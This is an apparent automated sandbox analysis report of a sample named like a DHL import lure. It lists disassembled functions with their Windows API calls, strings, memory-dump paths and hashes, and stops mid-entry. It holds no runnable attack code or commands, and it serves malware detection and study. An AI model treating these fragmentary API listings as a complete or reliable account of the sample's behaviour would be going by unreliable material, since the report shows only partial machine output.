Function 00578863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F9693
Part of subcall function 004F9639: SelectObject.GDI32(?,00000000), ref: 004F96A2
Part of subcall function 004F9639: BeginPath.GDI32(?), ref: 004F96B9
Part of subcall function 004F9639: SelectObject.GDI32(?,00000000), ref: 004F96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00578887
LineTo.GDI32(?,?,?), ref: 00578894
EndPath.GDI32(?), ref: 005788A4
StrokePath.GDI32(?), ref: 005788B2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 34cdc2aa3b8446c5165632302d7217cfbbbb7c52924d6892797adced793e4f88
Instruction ID: 568ee3fe55d625b0bf317d372c20f6e6e7487dbaa8717a58821b8076c4595a70
Opcode Fuzzy Hash: 34cdc2aa3b8446c5165632302d7217cfbbbb7c52924d6892797adced793e4f88
Instruction Fuzzy Hash: 2FF09A36041258BAEB122F94AC0DFDE3F59AF26310F448104FA15610E1C7741555FBE9

Function 004F98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004F98CC
SetTextColor.GDI32(?,?), ref: 004F98D6
SetBkMode.GDI32(?,00000001), ref: 004F98E9
GetStockObject.GDI32(00000005), ref: 004F98F1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 4bbe6f4f55f1168800cabe70c9471f66222f20403f1b80705aae5a22ecfc818a
Instruction ID: 8d01310eb0a1391cac0097078a2b5e9115c6fbaafd35a591be7d799d6cd59616
Opcode Fuzzy Hash: 4bbe6f4f55f1168800cabe70c9471f66222f20403f1b80705aae5a22ecfc818a
Instruction Fuzzy Hash: F2E06531644244ABDB215B74BC09BE93F10AB26335F14822DF6FA540E1C3714684FB10

Function 0054162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00541634
OpenThreadToken.ADVAPI32(00000000,?,?,?,005411D9), ref: 0054163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005411D9), ref: 00541648
OpenProcessToken.ADVAPI32(00000000,?,?,?,005411D9), ref: 0054164F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5e51a079767abff6cb09dfd05232653ebb4109db34f2998e5b1fb1b96cb83778
Instruction ID: 84bed773ec1ccf791d5c23d5111bca44e15fb339486b277f07d56a0504aa4966
Opcode Fuzzy Hash: 5e51a079767abff6cb09dfd05232653ebb4109db34f2998e5b1fb1b96cb83778
Instruction Fuzzy Hash: C2E08631601211DBD7201FA1BD0DB8A3F7CBF64795F15480CF249D9090D63484C8E7A8

Function 0053D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0053D858
GetDC.USER32(00000000), ref: 0053D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0053D882
ReleaseDC.USER32(?), ref: 0053D8A3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 0ad71d84f0e79e0f4cf86733dd07dccccd2a54cf8d2ad861faf07fa83a2632e4
Instruction ID: a270a06fb45dcc66f7d7502661044f899fc245d690b515f32b8bd1620edcd13a
Opcode Fuzzy Hash: 0ad71d84f0e79e0f4cf86733dd07dccccd2a54cf8d2ad861faf07fa83a2632e4
Instruction Fuzzy Hash: 6EE01AB4800204DFCB41AFA5E84C66DBFB2FB18311F10840DE84AE7250CB385986BF50

Function 0053D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0053D86C
GetDC.USER32(00000000), ref: 0053D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0053D882
ReleaseDC.USER32(?), ref: 0053D8A3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e8996c1a5f5f65c031b1d8dc47ea8204344766e9962f42a23bec6bb0e695a1df
Instruction ID: b8123b122278a55621e36b70bb50abc262c244ab6adf1e4502e2b4de01c39c74
Opcode Fuzzy Hash: e8996c1a5f5f65c031b1d8dc47ea8204344766e9962f42a23bec6bb0e695a1df
Instruction Fuzzy Hash: E0E01A74C00204DFCB41AFA5E84C66DBFB1BB18311B10800DE94AE7250CB385946BF40

Function 00554D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 004E7620: _wcslen.LIBCMT ref: 004E7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00554ED4

Strings

LPT, xrefs: 00554DFB
*, xrefs: 00554E10

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 679900f2ae07cda88b29bb1115d2a20438477a622a3d326570efe3513803b816
Instruction ID: b70ff67b3cfb9ad13edff7323bb84968efbbe78c246c2d5ed45ebb956caa8325
Opcode Fuzzy Hash: 679900f2ae07cda88b29bb1115d2a20438477a622a3d326570efe3513803b816
Instruction Fuzzy Hash: A2918074900244AFCB14DF59C494EA9BBF5BF44319F14809AE80A5F3A2D735ED89CF91

Function 0050E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0050E30D

Strings

pow, xrefs: 0050E2E5, 0050E302

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4c16c85440d79edb8c1e628b39734478be3c3c4acb220922cb05a3b73680cf0e
Instruction ID: 55f2b32967ca949f5c2833fa352240b959f9cf4996e146d86c8222a66a5dec4e
Opcode Fuzzy Hash: 4c16c85440d79edb8c1e628b39734478be3c3c4acb220922cb05a3b73680cf0e
Instruction Fuzzy Hash: 51515B71A0C10A96EB15772CD9073FD3FB8BB54740F344E98E495422E9EB348CC59B86

Function 00567771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0053569E,00000000,?,0057CC08,?,00000000,00000000), ref: 005678DD

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

CharUpperBuffW.USER32(0053569E,00000000,?,0057CC08,00000000,?,00000000,00000000), ref: 0056783B

Strings

<sZ, xrefs: 005677C8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sZ
API String ID: 3544283678-1570527033
Opcode ID: 40aad5fa41a57db7a3461c854ff574098c00eeba5581665370966686edfae104
Instruction ID: c862e5e25afa3a55ca9df79edc323a7cc746212ae9c664ab1cf801cf3b762abf
Opcode Fuzzy Hash: 40aad5fa41a57db7a3461c854ff574098c00eeba5581665370966686edfae104
Instruction Fuzzy Hash: 1C618F72914158AACF04EBA6CC91DFDBBB4BF18309F54052AE542A3091EB386A45DBA4

Function 004FE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 004FE1B1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 25fc09eb7831a8dfdf153ad9766758d8bda43e4becaefea1ab0a5edc20901bcc
Instruction ID: 3311caaf8d4d94a9d29ceecc3db715a1dc602436d87f6d652473066cfbd20187
Opcode Fuzzy Hash: 25fc09eb7831a8dfdf153ad9766758d8bda43e4becaefea1ab0a5edc20901bcc
Instruction Fuzzy Hash: AF51643190028ADFDB15DF29C4826BA7FE4FF55311F24409AE9419B2E0E738AD43DBA4

Function 004FF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 004FF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 004FF2BB

Strings

@, xrefs: 004FF2AF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 471e4c4e571696c903ad45d11b8bd544251fee8ecbdab3d6c4bbdcabb34673c6
Instruction ID: cc802dc00267ce747f9ba9416f38baed7d94e2aa1723c3a21d09d95c7134b900
Opcode Fuzzy Hash: 471e4c4e571696c903ad45d11b8bd544251fee8ecbdab3d6c4bbdcabb34673c6
Instruction Fuzzy Hash: 79517B714087849BD320AF12EC86BABBBF8FF94315F81484EF1D941195EB318629C76A

Function 00565745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005657E0
_wcslen.LIBCMT ref: 005657EC

Strings

CALLARGARRAY, xrefs: 005657E6, 005657EB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 7e6996f87b5e5892c2cb022d4a2d04209d87d75ab672ff50875f3533d662a93d
Instruction ID: bf7dbaf16ba5d23f17f097af4787dfd9b2e47b8f426d81d751a85f590a03ba9d
Opcode Fuzzy Hash: 7e6996f87b5e5892c2cb022d4a2d04209d87d75ab672ff50875f3533d662a93d
Instruction Fuzzy Hash: 59418D71A4020A9FCB14DFA9C8859AEBFB5FF59364F20406EE505A7291E7349D81CB90

Function 0055D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0055D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0055D13A

Strings

|, xrefs: 0055D10B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: a86448a68877943f7b24c36fc5561267b069660a2ddf5cf90871a1aa92f0756c
Instruction ID: 8f06d891cdbee1339c843d337dfba87c9696d83b4ed14bc5e5b3c37fb855dd2d
Opcode Fuzzy Hash: a86448a68877943f7b24c36fc5561267b069660a2ddf5cf90871a1aa92f0756c
Instruction Fuzzy Hash: 5C316F71D00209ABCF15EFA6CC85EEEBFB9FF14344F00005AF815A61A1DB35AA46DB64

Function 0057356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00573621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0057365C

Strings

static, xrefs: 005735BC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: a36d16d65ca12071931f3db890d2ba2b0ce7b694412fbca2dc43486e0d293911
Instruction ID: 98c9bd1f2d01d982def8b44a48726f132a903fa032f10d05eea47279c4d4355e
Opcode Fuzzy Hash: a36d16d65ca12071931f3db890d2ba2b0ce7b694412fbca2dc43486e0d293911
Instruction Fuzzy Hash: C0318171100604AEDB109F28EC80EBB7BA9FF98724F10C61DF9A997180DA35AD81E764

Function 00574537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0057461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00574634

Strings

', xrefs: 0057458E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 4a018505032510682487d9d1004751a456f8fd631c40e7cce80f8e9a23e8f8e6
Instruction ID: 0d693d89fce1d8473294a0a4b40bd27b832c0eaf4578a131c0a0a688c3500459
Opcode Fuzzy Hash: 4a018505032510682487d9d1004751a456f8fd631c40e7cce80f8e9a23e8f8e6
Instruction Fuzzy Hash: 0F313874A002099FDB14CFA9D990BEA7BB5FF09300F10806AE909AB351D770E941EF90

Function 004E3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005233A2

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 004E3A04

Strings

Line: , xrefs: 005233EB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 243a0a8299eea21f3a068fb8912290c37e20fc38589f1ad0fabf5ed16a9c025e
Instruction ID: 6d4931d3c7a9bfafe88321990a9b5006ad4369f45ceb80b2e18d8b5e2e2c6ec0
Opcode Fuzzy Hash: 243a0a8299eea21f3a068fb8912290c37e20fc38589f1ad0fabf5ed16a9c025e
Instruction Fuzzy Hash: EF31D4714083909AC361EF12DC49BEB77D8AF50716F100A2FF599831D1EB78AA48C7CA

Function 005731EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0057327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00573287

Strings

Combobox, xrefs: 00573249

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: bf2c6423a57de7dfb39bf5fd8a17a7caa7f3bb564e3e2257356d2e3f6ced1c9a
Instruction ID: 582697c9a926338e7eaf1baf391c1dcf071498528c0f14692c4b9aaf406a578a
Opcode Fuzzy Hash: bf2c6423a57de7dfb39bf5fd8a17a7caa7f3bb564e3e2257356d2e3f6ced1c9a
Instruction Fuzzy Hash: 4711B2753002087FEF219E54EC84EBB3F6AFB983A4F108529F91CAB291D6319D51B760

Function 00573710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004E604C
Part of subcall function 004E600E: GetStockObject.GDI32(00000011), ref: 004E6060
Part of subcall function 004E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 004E606A

GetWindowRect.USER32(00000000,?), ref: 0057377A
GetSysColor.USER32(00000012), ref: 00573794

Strings

static, xrefs: 00573757

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: dc392632fb2e7a6e5888a9393dbdf3d2348d4244b6e7e6e5d052dfa57ad1a244
Instruction ID: 8337588b2e4aa49b37bd37087b6fdfc6bdcc5e91edde596f99fa4b998a619aa2
Opcode Fuzzy Hash: dc392632fb2e7a6e5888a9393dbdf3d2348d4244b6e7e6e5d052dfa57ad1a244
Instruction Fuzzy Hash: 391159B2610209AFDB00DFA8DC45EEA7BB8FB08314F004918F959E2250E735E951AB50

Function 0055CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0055CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0055CDA6

Strings

<local>, xrefs: 0055CD66

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d15736df1c1550c71e42eefdeb210feee40b4b7d2d09066a5a9f2cd23ec18dac
Instruction ID: e8b06eaf2558b7ae15c127fdea4ab356db5a9c68febeb4dcf69a0aa97835f68b
Opcode Fuzzy Hash: d15736df1c1550c71e42eefdeb210feee40b4b7d2d09066a5a9f2cd23ec18dac
Instruction Fuzzy Hash: 3D11A071205775BED7284A668C59FE7BEBCFB227A5F00462BB909C3180D6609848D6F0

Function 00573429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 005734AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005734BA

Strings

edit, xrefs: 0057348F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

